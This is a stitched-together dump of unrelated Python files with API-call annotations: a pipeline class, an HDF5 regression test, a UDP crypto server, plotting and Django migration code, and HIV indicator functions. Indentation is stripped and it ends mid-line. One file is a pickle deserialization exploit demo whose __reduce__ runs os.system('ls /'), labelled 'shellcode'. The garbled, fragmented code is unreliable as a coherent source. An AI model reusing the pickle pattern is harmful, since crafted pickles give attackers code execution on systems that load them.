def __call__(self, *args, **kwargs):
await_f = None
for f in self._pipeline:
if await_f is not None:
if _name_of(f) != await_f:
continue
else:
await_f = None
cmd = f(*args, **kwargs)
if isinstance(cmd, PipelineCommand):
if cmd is Done:
break
elif isinstance(cmd, SkipTo):
await_f = cmd.function_name
if await_f is not None:
raise NameError("Function {} never visited".format(await_f))
class ModulePipeline(Pipeline):
"""
Extract a pipeline from a Python module.
This executes each function in the order laid out by the file.
"""
def __init__(self, module, skip_private_applications=True,
include_private_captures=True, reloading=True):
"""
:param module: the python module to load
:param skip_private_applications: if True, then functions prefixed with
'_' are not included in the transformation pipeline
:param include_private_captures: if True, then functions prefixed with
'_' ARE captured for error analysis.
:param reloading: if True, reloads the module when calling `reload()`
"""
self._module = module
self._skip_private_applications = skip_private_applications
self._include_private_captures = include_private_captures
self._reloading = reloading
super(ModulePipeline, self).__init__()
self.reload(force=True)
def reload(self, force=False):
"""
Reload the underlying module.
:param force: if True, reloads the module, even if reloading is false.
"""
# Note: reloading the module on the initial load actually makes sense
# given how it's used. In a notebook, you import the module, then
# pass it to the constructor. It's easy to step over that
# constructor again, passing the old module reference.
if force or self._reloading:
self._pipeline = []
self._captures = []
for f in collect_pipeline(self._module, skip_private=False):
is_private = f.__name__.startswith('_')
if not self._skip_private_applications or not is_private:
self._pipeline.append(f)
if self._include_private_captures or not is_private:
self._captures.append(f)
|
[
"ast.iter_child_nodes",
"imp.reload",
"inspect.getsourcefile"
] |
[((904, 930), 'ast.iter_child_nodes', 'ast.iter_child_nodes', (['root'], {}), '(root)\n', (924, 930), False, 'import ast\n'), ((705, 747), 'inspect.getsourcefile', 'inspect.getsourcefile', (['file_path_or_module'], {}), '(file_path_or_module)\n', (726, 747), False, 'import inspect\n'), ((1420, 1438), 'imp.reload', 'imp.reload', (['module'], {}), '(module)\n', (1430, 1438), False, 'import imp\n')]
|
"""
Test that data encoded with earlier versions can still be decoded correctly.
"""
from __future__ import absolute_import, division, print_function
import pathlib
import unittest
import numpy as np
import h5py
TEST_DATA_DIR = pathlib.Path(__file__).parent / "data"
OUT_FILE_TEMPLATE = "regression_%s.h5"
VERSIONS = [
"0.1.3",
]
class TestAll(unittest.TestCase):
def test_regression(self):
for version in VERSIONS:
file_name = TEST_DATA_DIR / (OUT_FILE_TEMPLATE % version)
f = h5py.File(file_name, "r")
g_orig = f["origional"]
g_comp = f["compressed"]
for dset_name in g_comp.keys():
self.assertTrue(np.all(g_comp[dset_name][:] == g_orig[dset_name][:]))
if __name__ == "__main__":
unittest.main()
|
[
"unittest.main",
"pathlib.Path",
"h5py.File",
"numpy.all"
] |
[((791, 806), 'unittest.main', 'unittest.main', ([], {}), '()\n', (804, 806), False, 'import unittest\n'), ((234, 256), 'pathlib.Path', 'pathlib.Path', (['__file__'], {}), '(__file__)\n', (246, 256), False, 'import pathlib\n'), ((528, 553), 'h5py.File', 'h5py.File', (['file_name', '"""r"""'], {}), "(file_name, 'r')\n", (537, 553), False, 'import h5py\n'), ((704, 756), 'numpy.all', 'np.all', (['(g_comp[dset_name][:] == g_orig[dset_name][:])'], {}), '(g_comp[dset_name][:] == g_orig[dset_name][:])\n', (710, 756), True, 'import numpy as np\n')]
|
#!/usr/bin/env python
import socket
from contextlib import closing
import pssst
import click
from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey
from cryptography.hazmat.primitives.serialization import Encoding, PublicFormat
@click.command()
@click.option('-k', '--key-file', help="File containing hex encoded private key")
@click.option('-p', '--port', type=int, help="Port on which to listen", default=45678)
def main(key_file, port):
if key_file:
private_key_text = open(key_file).readline().strip()
private_key = X25519PrivateKey.from_private_bytes(bytes.fromhex(private_key_text))
else:
private_key = X25519PrivateKey.generate()
print("Server public key: ",
private_key.public_key().public_bytes(encoding=Encoding.Raw, format=PublicFormat.Raw).hex())
server_handler = pssst.PSSSTServer(private_key)
with closing(socket.socket(socket.AF_INET, socket.SOCK_DGRAM)) as server_socket:
server_socket.bind(('127.0.0.1', port))
while True:
packet, client_addr = server_socket.recvfrom(2048)
try:
data, client_key, reply_handler = server_handler.unpack_request(packet)
reply_packet = reply_handler(data)
server_socket.sendto(reply_packet, client_addr)
except pssst.PSSSTException as e:
print("Server Exception: {}".format(e))
if __name__ == "__main__":
main()
|
[
"cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate",
"socket.socket",
"click.option",
"click.command",
"pssst.PSSSTServer"
] |
[((257, 272), 'click.command', 'click.command', ([], {}), '()\n', (270, 272), False, 'import click\n'), ((274, 359), 'click.option', 'click.option', (['"""-k"""', '"""--key-file"""'], {'help': '"""File containing hex encoded private key"""'}), "('-k', '--key-file', help='File containing hex encoded private key'\n )\n", (286, 359), False, 'import click\n'), ((356, 445), 'click.option', 'click.option', (['"""-p"""', '"""--port"""'], {'type': 'int', 'help': '"""Port on which to listen"""', 'default': '(45678)'}), "('-p', '--port', type=int, help='Port on which to listen',\n default=45678)\n", (368, 445), False, 'import click\n'), ((860, 890), 'pssst.PSSSTServer', 'pssst.PSSSTServer', (['private_key'], {}), '(private_key)\n', (877, 890), False, 'import pssst\n'), ((673, 700), 'cryptography.hazmat.primitives.asymmetric.x25519.X25519PrivateKey.generate', 'X25519PrivateKey.generate', ([], {}), '()\n', (698, 700), False, 'from cryptography.hazmat.primitives.asymmetric.x25519 import X25519PrivateKey\n'), ((917, 965), 'socket.socket', 'socket.socket', (['socket.AF_INET', 'socket.SOCK_DGRAM'], {}), '(socket.AF_INET, socket.SOCK_DGRAM)\n', (930, 965), False, 'import socket\n')]
|
"""
Script for the evolution gif of the pdfs obtained with qcdnum.
The pdfs obtained by the DGLAP evolution equations, using qcdnum, are stored in files, containing each one a fixed q2 energy scale.
The output files with the pdfs and x values are stored in the directory named output, inside qcdnum.
Those output files follows the following convention: nameCxxFile_q2_energyscale.csv
"""
import matplotlib.pyplot as plt
import numpy as np
import seaborn as sns
import pandas as pd
import glob
from PIL import Image
import os
# to delete the old images
os.system("rm imgs/*.png imgs/*.gif")
# url of the directory where the output files of qcdnum script are stored.
output_directory_url = "/opt/qcdnum-17-01-14/output/"
save_imgs_url = "imgs/"
names = []
plt.rcParams.update({"font.size":13})
sns.set_style("darkgrid")
# for each .csv output file
for csv in glob.glob(output_directory_url + "*.csv"):
print(csv)
array = csv.split("_")
q = float(array[2][:-4])
dataset = pd.read_csv(csv, delimiter=" ")
dataset = dataset.set_index("x")
names.append(int(q*100))
plt.figure()
lp = sns.scatterplot(data=dataset.iloc[:,:]) #, palette=['orange']
lp.set(xscale="log")
lp.text(0.78, 1.2, r'$Q^2 = 2.56$GeV$^2$', fontsize=10)
plt.ylabel("$x$pdf")
plt.xlabel("$x$")
plt.title(f"$Q^2$ = {q:.2e} $GeV^2$")
plt.ylim((0.0, 1.0))
plt.xlim((10e-3, 1))
plt.savefig(save_imgs_url + str(int(q*100)) + ".png", dpi=300)
names.sort()
# Create the frames
frames = []
imgs = [save_imgs_url + str(x) + ".png" for x in names]
for i in imgs:
new_frame = Image.open(i)
frames.append(new_frame)
# Save into a GIF file that loops forever
frames[0].save(save_imgs_url+'pdfs_evolution_gif.gif', format='GIF',
append_images=frames[1:],
save_all=True,
duration=10, loop=0)
|
[
"matplotlib.pyplot.title",
"seaborn.set_style",
"matplotlib.pyplot.xlim",
"seaborn.scatterplot",
"pandas.read_csv",
"matplotlib.pyplot.ylim",
"os.system",
"PIL.Image.open",
"matplotlib.pyplot.figure",
"matplotlib.pyplot.rcParams.update",
"glob.glob",
"matplotlib.pyplot.ylabel",
"matplotlib.pyplot.xlabel"
] |
[((555, 592), 'os.system', 'os.system', (['"""rm imgs/*.png imgs/*.gif"""'], {}), "('rm imgs/*.png imgs/*.gif')\n", (564, 592), False, 'import os\n'), ((764, 802), 'matplotlib.pyplot.rcParams.update', 'plt.rcParams.update', (["{'font.size': 13}"], {}), "({'font.size': 13})\n", (783, 802), True, 'import matplotlib.pyplot as plt\n'), ((802, 827), 'seaborn.set_style', 'sns.set_style', (['"""darkgrid"""'], {}), "('darkgrid')\n", (815, 827), True, 'import seaborn as sns\n'), ((869, 910), 'glob.glob', 'glob.glob', (["(output_directory_url + '*.csv')"], {}), "(output_directory_url + '*.csv')\n", (878, 910), False, 'import glob\n'), ((990, 1021), 'pandas.read_csv', 'pd.read_csv', (['csv'], {'delimiter': '""" """'}), "(csv, delimiter=' ')\n", (1001, 1021), True, 'import pandas as pd\n'), ((1088, 1100), 'matplotlib.pyplot.figure', 'plt.figure', ([], {}), '()\n', (1098, 1100), True, 'import matplotlib.pyplot as plt\n'), ((1108, 1148), 'seaborn.scatterplot', 'sns.scatterplot', ([], {'data': 'dataset.iloc[:, :]'}), '(data=dataset.iloc[:, :])\n', (1123, 1148), True, 'import seaborn as sns\n'), ((1255, 1275), 'matplotlib.pyplot.ylabel', 'plt.ylabel', (['"""$x$pdf"""'], {}), "('$x$pdf')\n", (1265, 1275), True, 'import matplotlib.pyplot as plt\n'), ((1278, 1295), 'matplotlib.pyplot.xlabel', 'plt.xlabel', (['"""$x$"""'], {}), "('$x$')\n", (1288, 1295), True, 'import matplotlib.pyplot as plt\n'), ((1298, 1335), 'matplotlib.pyplot.title', 'plt.title', (['f"""$Q^2$ = {q:.2e} $GeV^2$"""'], {}), "(f'$Q^2$ = {q:.2e} $GeV^2$')\n", (1307, 1335), True, 'import matplotlib.pyplot as plt\n'), ((1338, 1358), 'matplotlib.pyplot.ylim', 'plt.ylim', (['(0.0, 1.0)'], {}), '((0.0, 1.0))\n', (1346, 1358), True, 'import matplotlib.pyplot as plt\n'), ((1361, 1380), 'matplotlib.pyplot.xlim', 'plt.xlim', (['(0.01, 1)'], {}), '((0.01, 1))\n', (1369, 1380), True, 'import matplotlib.pyplot as plt\n'), ((1581, 1594), 'PIL.Image.open', 'Image.open', (['i'], {}), '(i)\n', (1591, 1594), False, 'from PIL import Image\n')]
|
# Generated by Django 3.0.10 on 2021-02-11 21:09
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('rolodex', '0012_auto_20210211_1853'),
]
operations = [
migrations.AddField(
model_name='projectsubtask',
name='marked_complete',
field=models.DateField(blank=True, help_text='Date the task was marked complete', null=True, verbose_name='Marked Complete'),
),
]
|
[
"django.db.models.DateField"
] |
[((352, 474), 'django.db.models.DateField', 'models.DateField', ([], {'blank': '(True)', 'help_text': '"""Date the task was marked complete"""', 'null': '(True)', 'verbose_name': '"""Marked Complete"""'}), "(blank=True, help_text='Date the task was marked complete',\n null=True, verbose_name='Marked Complete')\n", (368, 474), False, 'from django.db import migrations, models\n')]
|
# Copyright 2021 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Set of functions to work with Spark DataFrames containing FHIR resources.
See test_spark.ipynb for real examples of how to create/use these functions.
"""
# TODO move common and query related parts to `query_lib.py` and only keep
# indicator calculation logic that is independent of Spark here.
from typing import List
from datetime import datetime
from dateutil.parser import parse as parse_date
import pandas as pd
import common
import query_lib
def _find_age_band(birth_date: str, end_date: datetime) -> str:
"""Given the birth date, finds the age_band for PEPFAR disaggregation."""
birth = parse_date(birth_date)
age = int((end_date - birth).days / 365.25)
if age < 1:
return '0-1'
if age <= 4:
return '1-4'
if age <= 9:
return '5-9'
if age <= 14:
return '10-14'
if age <= 19:
return '15-19'
if age <= 24:
return '20-24'
if age <= 49:
return '25-49'
return '50+'
def _agg_buckets(birth_date: str, gender: str, end_date: datetime) -> List[str]:
"""Generates the list of all PEPFAR disaggregation buckets."""
age_band = _find_age_band(birth_date, end_date)
return [age_band + '_' + gender, 'ALL-AGES_' + gender,
age_band + '_ALL-GENDERS', 'ALL-AGES_ALL-GENDERS']
def _gen_counts_and_ratio(temp_df: pd.DataFrame, end_date: datetime,
ind_name: str) -> pd.DataFrame:
"""Generates aggregated dataframe when supplied with patient-level df"""
temp_df['buckets'] = temp_df.apply(
lambda x: _agg_buckets(x.birthDate, x.gender, end_date), axis=1)
temp_df_exp = temp_df.explode('buckets')
temp_df_exp = temp_df_exp.groupby(
[ind_name, 'buckets'], as_index=False).count()[[
ind_name, 'buckets', 'patientId']].rename(
columns={'patientId': ind_name + '_count'})
# calculate ratio
num_patients = len(temp_df.index)
temp_df_exp[ind_name + '_ratio'] = temp_df_exp[
ind_name + '_count'] / num_patients
return temp_df_exp
def calc_TX_PVLS(patient_agg_obs: pd.DataFrame, VL_code: str,
failure_threshold: int, end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_PVLS indicator with its corresponding disaggregations.
Args:
patient_agg_obs: An output from `patient_query.find_patient_aggregates()`.
VL_code: The code for viral load values.
failure_threshold: VL count threshold of failure.
end_date: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == VL_code)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['latest_vl_value'] = temp_df['last_value'].astype(float)
temp_df['sup_VL'] = (temp_df['latest_vl_value'] < failure_threshold)
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'sup_VL')
return temp_df
def calc_TX_NEW(patient_agg_obs: pd.DataFrame, ARV_plan: str,
start_drug: List[str], end_date_str: str = None) -> pd.DataFrame:
"""Calculates TX_NEW indicator with its corresponding disaggregations.
TX_NEW indicator counts the number of adults and children newly enrolled
on antiretroviral therapy (ART) prior to the provided end-date
Args:
patient_agg_obs: A DataFrame generated by `patient_query.find_patient_aggregates()`.
ARV_plan: The concept question code for ANTIRETROVIRAL PLAN
start_drug: The concept answer codes for START DRUG
end_date: The string representation of the last date as 'YYYY-MM-DD'.
Returns:
The aggregated DataFrame with age/gender buckets.
"""
end_date = datetime.today()
if end_date_str:
end_date = parse_date(end_date_str)
temp_df = patient_agg_obs[(patient_agg_obs['code'] == ARV_plan)].copy()
# Note the above copy is used to avoid setting a new column on a slice next:
temp_df['TX_NEW'] = (temp_df['last_value_code'].isin(start_drug))
temp_df = _gen_counts_and_ratio(temp_df, end_date, 'TX_NEW')
return temp_df
|
[
"dateutil.parser.parse",
"datetime.datetime.today"
] |
[((1186, 1208), 'dateutil.parser.parse', 'parse_date', (['birth_date'], {}), '(birth_date)\n', (1196, 1208), True, 'from dateutil.parser import parse as parse_date\n'), ((3122, 3138), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (3136, 3138), False, 'from datetime import datetime\n'), ((4305, 4321), 'datetime.datetime.today', 'datetime.today', ([], {}), '()\n', (4319, 4321), False, 'from datetime import datetime\n'), ((3173, 3197), 'dateutil.parser.parse', 'parse_date', (['end_date_str'], {}), '(end_date_str)\n', (3183, 3197), True, 'from dateutil.parser import parse as parse_date\n'), ((4356, 4380), 'dateutil.parser.parse', 'parse_date', (['end_date_str'], {}), '(end_date_str)\n', (4366, 4380), True, 'from dateutil.parser import parse as parse_date\n')]
|
import os
import pickle
from contextlib import contextmanager
class ShellSystemChroot(object):
def __reduce__(self):
# this will list contents of root / folder
return (os.system, ('ls /',))
@contextmanager
def system_chroot():
""" A simple chroot """
os.chroot('/')
yield
def serialize():
with system_chroot():
shellcode = pickle.dumps(ShellSystemChroot())
return shellcode
def deserialize(exploit_code):
with system_chroot():
pickle.loads(exploit_code)
if __name__ == '__main__':
shellcode = serialize()
print('Obtaining files...')
deserialize(shellcode)
|
[
"pickle.loads",
"os.chroot"
] |
[((262, 276), 'os.chroot', 'os.chroot', (['"""/"""'], {}), "('/')\n", (271, 276), False, 'import os\n'), ((448, 474), 'pickle.loads', 'pickle.loads', (['exploit_code'], {}), '(exploit_code)\n', (460, 474), False, 'import pickle\n')]
|
#!/usr/bin/env python
# coding=utf-8
"""MetricsEvaluator engine action.
Use this module to add the project main code.
"""
from .._compatibility import six
from .._logging import get_logger
from marvin_python_toolbox.engine_base import EngineBaseTraining
from ..model_serializer import ModelSerializer
__all__ = ['MetricsEvaluator']
logger = get_logger('metrics_evaluator')
class MetricsEvaluator(ModelSerializer, EngineBaseTraining):
def __init__(self, **kwargs):
super(MetricsEvaluator, self).__init__(**kwargs)
def execute(self, params, **kwargs):
import h2o
from sklearn import metrics
# h2o.init()
y_test = self.marvin_dataset['test_X']['Species']
self.marvin_dataset['test_X'].drop(columns='Species', inplace=True)
teste = h2o.H2OFrame.from_python(self.marvin_dataset['test_X'])
preds = self.marvin_model.predict(teste).as_data_frame()['predict'].values
self.marvin_metrics = metrics.accuracy_score(y_test, preds)
|
[
"h2o.H2OFrame.from_python",
"sklearn.metrics.accuracy_score"
] |
[((806, 861), 'h2o.H2OFrame.from_python', 'h2o.H2OFrame.from_python', (["self.marvin_dataset['test_X']"], {}), "(self.marvin_dataset['test_X'])\n", (830, 861), False, 'import h2o\n'), ((975, 1012), 'sklearn.metrics.accuracy_score', 'metrics.accuracy_score', (['y_test', 'preds'], {}), '(y_test, preds)\n', (997, 1012), False, 'from sklearn import metrics\n')]
|
# Generated by Django 2.2.3 on 2019-09-26 19:42
import bettertexts.models
import ckeditor.fields
from decimal import Decimal
from django.conf import settings
import django.contrib.sites.managers
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
import django_extensions.db.fields
import model_utils.fields
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('contenttypes', '0002_remove_content_type_name'),
('sites', '0002_alter_domain_unique'),
]
operations = [
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.CharField(max_length=200, verbose_name='question')),
('position', models.IntegerField(verbose_name='position')),
],
options={
'verbose_name': 'question',
'verbose_name_plural': 'questions',
'ordering': ('position',),
},
),
migrations.CreateModel(
name='Type',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=200, verbose_name='name')),
('header', models.CharField(max_length=200, verbose_name='main header')),
('rating_header', models.CharField(blank=True, max_length=200, verbose_name='rating header')),
('comment_header', models.CharField(blank=True, max_length=200, verbose_name='comment header')),
('response_header', models.CharField(blank=True, max_length=200, verbose_name='response header')),
('rating_enabled', models.BooleanField(default=True, verbose_name='rating enabled')),
('comment_enabled', models.BooleanField(default=True, verbose_name='comment enabled')),
('notification_enabled', models.BooleanField(default=True, verbose_name='notification enabled')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
],
options={
'verbose_name': 'communication type',
'verbose_name_plural': 'communication types',
},
managers=[
('objects', bettertexts.models.TypeManager()),
('on_site', django.contrib.sites.managers.CurrentSiteManager()),
],
),
migrations.CreateModel(
name='TextComment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('object_pk', models.TextField(verbose_name='object ID')),
('user_name', models.CharField(blank=True, max_length=50, verbose_name="user's name")),
('user_email', models.EmailField(blank=True, max_length=254, verbose_name="user's email address")),
('user_url', models.URLField(blank=True, verbose_name="user's URL")),
('inform', models.BooleanField(default=False, help_text='Check this box to keep me informed about updates.', verbose_name='Keep informed')),
('involved', models.BooleanField(default=False, help_text='Check this box to make more texts better.', verbose_name='Stay involved')),
('comment', models.TextField(max_length=3000, verbose_name='comment')),
('submit_date', models.DateTimeField(default=None, verbose_name='date/time submitted')),
('ip_address', models.GenericIPAddressField(blank=True, null=True, unpack_ipv4=True, verbose_name='IP address')),
('is_public', models.BooleanField(default=True, help_text='Uncheck this box to make the comment effectively disappear from the site.', verbose_name='is public')),
('is_removed', models.BooleanField(default=False, help_text='Check this box if the comment is inappropriate. A "This comment has been removed" message will be displayed instead.', verbose_name='is removed')),
('content_type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='content_type_set_for_textcomment', to='contenttypes.ContentType', verbose_name='content type')),
('site', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('user', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='textcomment_comments', to=settings.AUTH_USER_MODEL, verbose_name='user')),
],
options={
'verbose_name': 'comment',
'verbose_name_plural': 'comments',
'ordering': ('submit_date',),
'permissions': [('can_moderate', 'Can moderate comments')],
},
),
migrations.CreateModel(
name='Text',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('title', models.CharField(max_length=200, verbose_name='title')),
('slug', django_extensions.db.fields.RandomCharField(blank=True, editable=False, length=8, unique=True, verbose_name='slug')),
('intro', ckeditor.fields.RichTextField(blank=True, max_length=20000, verbose_name='intro')),
('body', ckeditor.fields.RichTextField(max_length=20000, verbose_name='text')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('pub_date', models.DateTimeField(auto_now_add=True, verbose_name='date published')),
('end_date', models.DateTimeField(blank=True, null=True, verbose_name='date end')),
('site', models.ForeignKey(default=1, editable=False, on_delete=django.db.models.deletion.CASCADE, to='sites.Site')),
('type', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type')),
],
options={
'verbose_name': 'text',
'verbose_name_plural': 'texts',
},
managers=[
('objects', bettertexts.models.TypeManager()),
],
),
migrations.CreateModel(
name='Rating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('version', models.PositiveIntegerField(default=0, verbose_name='version')),
('range', models.PositiveIntegerField(default=10, verbose_name='range')),
('count', models.PositiveIntegerField(default=0, verbose_name='count')),
('total', models.PositiveIntegerField(default=0, verbose_name='total')),
('average', models.DecimalField(decimal_places=2, default=Decimal('0'), max_digits=6, verbose_name='average')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Question', verbose_name='Question')),
('text', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Text')),
],
options={
'verbose_name': 'rating',
'verbose_name_plural': 'ratings',
'unique_together': {('text', 'version', 'question')},
},
),
migrations.AddField(
model_name='question',
name='type',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='bettertexts.Type'),
),
migrations.CreateModel(
name='UserRating',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created', model_utils.fields.AutoCreatedField(default=django.utils.timezone.now, editable=False, verbose_name='created')),
('modified', model_utils.fields.AutoLastModifiedField(default=django.utils.timezone.now, editable=False, verbose_name='modified')),
('user', models.CharField(max_length=200)),
('ip', models.GenericIPAddressField(blank=True, null=True)),
('score', models.PositiveSmallIntegerField()),
('rating', models.ForeignKey(editable=False, on_delete=django.db.models.deletion.CASCADE, related_name='user_ratings', to='bettertexts.Rating')),
],
options={
'unique_together': {('user', 'rating')},
},
),
]
|
[
"django.db.models.TextField",
"django.db.models.URLField",
"django.db.migrations.swappable_dependency",
"decimal.Decimal",
"django.db.models.ForeignKey",
"django.db.models.CharField",
"django.db.models.PositiveIntegerField",
"django.db.models.BooleanField",
"django.db.models.AutoField",
"django.db.models.EmailField",
"django.db.models.IntegerField",
"django.db.models.GenericIPAddressField",
"django.db.models.PositiveSmallIntegerField",
"django.db.models.DateTimeField"
] |
[((451, 508), 'django.db.migrations.swappable_dependency', 'migrations.swappable_dependency', (['settings.AUTH_USER_MODEL'], {}), '(settings.AUTH_USER_MODEL)\n', (482, 508), False, 'from django.db import migrations, models\n'), ((7800, 7890), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""bettertexts.Type"""'}), "(on_delete=django.db.models.deletion.CASCADE, to=\n 'bettertexts.Type')\n", (7817, 7890), False, 'from django.db import migrations, models\n'), ((747, 840), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (763, 840), False, 'from django.db import migrations, models\n'), ((868, 925), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""question"""'}), "(max_length=200, verbose_name='question')\n", (884, 925), False, 'from django.db import migrations, models\n'), ((957, 1001), 'django.db.models.IntegerField', 'models.IntegerField', ([], {'verbose_name': '"""position"""'}), "(verbose_name='position')\n", (976, 1001), False, 'from django.db import migrations, models\n'), ((1307, 1400), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (1323, 1400), False, 'from django.db import migrations, models\n'), ((1424, 1477), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""name"""'}), "(max_length=200, verbose_name='name')\n", (1440, 1477), False, 'from django.db import migrations, models\n'), ((1507, 1567), 'django.db.models.CharField', 'models.CharField', ([], {'max_length': '(200)', 'verbose_name': '"""main header"""'}), "(max_length=200, verbose_name='main header')\n", (1523, 1567), False, 'from django.db import migrations, models\n'), ((1604, 1678), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""rating header"""'}), "(blank=True, max_length=200, verbose_name='rating header')\n", (1620, 1678), False, 'from django.db import migrations, models\n'), ((1716, 1791), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""comment header"""'}), "(blank=True, max_length=200, verbose_name='comment header')\n", (1732, 1791), False, 'from django.db import migrations, models\n'), ((1830, 1906), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(200)', 'verbose_name': '"""response header"""'}), "(blank=True, max_length=200, verbose_name='response header')\n", (1846, 1906), False, 'from django.db import migrations, models\n'), ((1944, 2008), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""rating enabled"""'}), "(default=True, verbose_name='rating enabled')\n", (1963, 2008), False, 'from django.db import migrations, models\n'), ((2047, 2112), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""comment enabled"""'}), "(default=True, verbose_name='comment enabled')\n", (2066, 2112), False, 'from django.db import migrations, models\n'), ((2156, 2226), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'verbose_name': '"""notification enabled"""'}), "(default=True, verbose_name='notification enabled')\n", (2175, 2226), False, 'from django.db import migrations, models\n'), ((2254, 2333), 'django.db.models.ForeignKey', 'models.ForeignKey', ([], {'on_delete': 'django.db.models.deletion.CASCADE', 'to': '"""sites.Site"""'}), "(on_delete=django.db.models.deletion.CASCADE, to='sites.Site')\n", (2271, 2333), False, 'from django.db import migrations, models\n'), ((2805, 2898), 'django.db.models.AutoField', 'models.AutoField', ([], {'auto_created': '(True)', 'primary_key': '(True)', 'serialize': '(False)', 'verbose_name': '"""ID"""'}), "(auto_created=True, primary_key=True, serialize=False,\n verbose_name='ID')\n", (2821, 2898), False, 'from django.db import migrations, models\n'), ((2927, 2969), 'django.db.models.TextField', 'models.TextField', ([], {'verbose_name': '"""object ID"""'}), "(verbose_name='object ID')\n", (2943, 2969), False, 'from django.db import migrations, models\n'), ((3002, 3073), 'django.db.models.CharField', 'models.CharField', ([], {'blank': '(True)', 'max_length': '(50)', 'verbose_name': '"""user\'s name"""'}), '(blank=True, max_length=50, verbose_name="user\'s name")\n', (3018, 3073), False, 'from django.db import migrations, models\n'), ((3107, 3194), 'django.db.models.EmailField', 'models.EmailField', ([], {'blank': '(True)', 'max_length': '(254)', 'verbose_name': '"""user\'s email address"""'}), '(blank=True, max_length=254, verbose_name=\n "user\'s email address")\n', (3124, 3194), False, 'from django.db import migrations, models\n'), ((3221, 3275), 'django.db.models.URLField', 'models.URLField', ([], {'blank': '(True)', 'verbose_name': '"""user\'s URL"""'}), '(blank=True, verbose_name="user\'s URL")\n', (3236, 3275), False, 'from django.db import migrations, models\n'), ((3305, 3442), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Check this box to keep me informed about updates."""', 'verbose_name': '"""Keep informed"""'}), "(default=False, help_text=\n 'Check this box to keep me informed about updates.', verbose_name=\n 'Keep informed')\n", (3324, 3442), False, 'from django.db import migrations, models\n'), ((3464, 3588), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'help_text': '"""Check this box to make more texts better."""', 'verbose_name': '"""Stay involved"""'}), "(default=False, help_text=\n 'Check this box to make more texts better.', verbose_name='Stay involved')\n", (3483, 3588), False, 'from django.db import migrations, models\n'), ((3614, 3671), 'django.db.models.TextField', 'models.TextField', ([], {'max_length': '(3000)', 'verbose_name': '"""comment"""'}), "(max_length=3000, verbose_name='comment')\n", (3630, 3671), False, 'from django.db import migrations, models\n'), ((3706, 3776), 'django.db.models.DateTimeField', 'models.DateTimeField', ([], {'default': 'None', 'verbose_name': '"""date/time submitted"""'}), "(default=None, verbose_name='date/time submitted')\n", (3726, 3776), False, 'from django.db import migrations, models\n'), ((3810, 3910), 'django.db.models.GenericIPAddressField', 'models.GenericIPAddressField', ([], {'blank': '(True)', 'null': '(True)', 'unpack_ipv4': '(True)', 'verbose_name': '"""IP address"""'}), "(blank=True, null=True, unpack_ipv4=True,\n verbose_name='IP address')\n", (3838, 3910), False, 'from django.db import migrations, models\n'), ((3939, 4095), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(True)', 'help_text': 